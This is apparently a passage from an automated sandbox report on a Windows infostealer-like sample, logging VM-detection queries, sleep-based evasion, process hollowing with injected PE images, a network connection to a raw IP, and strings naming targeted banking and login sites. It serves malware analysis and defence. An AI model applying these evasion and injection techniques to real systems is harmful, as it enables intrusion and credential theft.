              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2A50000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2AD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 4AD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 1230000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2B20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 4C80000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 17F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 3380000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 31A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 1070000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 4D60000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2B80000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2DB0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2B80000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2E20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 3030000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 5030000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: F30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 29D0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 49D0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2C10000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2DB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 4DB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2650000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 27C0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 47C0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: C10000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2960000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: DA0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2740000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2910000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 4910000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: AD0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2560000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: B20000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2D60000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2FB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2DD0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: C50000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 29A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: F30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 830000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2270000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2090000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: B60000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2840000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2690000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 27B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2930000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 4930000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: A40000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2520000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2390000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 1290000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2D30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: 2AB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 820000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2720000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2430000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 20E0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 22E0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 42E0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: F60000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2730000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 4730000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 740000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2350000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 21B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 15F0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 3100000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 15F0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: C80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 27E0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory allocated: 2610000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeWindow / User API: threadDelayed 9785Jump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1109
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 2940Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6816Thread sleep time: -30437127721620741s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5280Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5508Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5848Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6860Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6336Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 2156Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 332Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1988Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1928Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 3020Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 4044Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1568Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 4500Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 3572Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6364Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5932Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 3688Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 1528Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7076Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1000Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5944Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 4536Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 6452Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Service.exe TID: 2644Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5284Thread sleep count: 1109 > 30
              Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5284Thread sleep count: 213 > 30
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Service.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
              Source: GeUT.exe, 00000005.00000002.2741664040.0000000001287000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: discord.comVMware20,11696494690f
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: AMC password management pageVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: wscript.exe, 00000000.00000002.1479116437.000002BDE16E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: wscript.exe, 00000000.00000002.1479202696.000002BDE1727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1468880158.000002BDE1727000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wscript.exe, 00000003.00000003.1507105229.000001EF34FA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: global block list test formVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: wscript.exe, 00000003.00000003.1507105229.000001EF34FA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\Ph
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: wscript.exe, 00000003.00000002.1509798308.000001EF37E8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD04&
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: tmp5F83.tmp.dat.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Benign windows process drops PE files
              Source: C:\Windows\System32\wscript.exeFile created: GeUT.exe.3.drJump to dropped file
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 192.210.215.11 80Jump to behavior
              .NET source code references suspicious native API functions
              Source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, reflect.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
              Source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, reflect.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
              Source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, reflect.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
              Injects a PE file into a foreign processes
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 340000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Service.exeMemory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMemory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
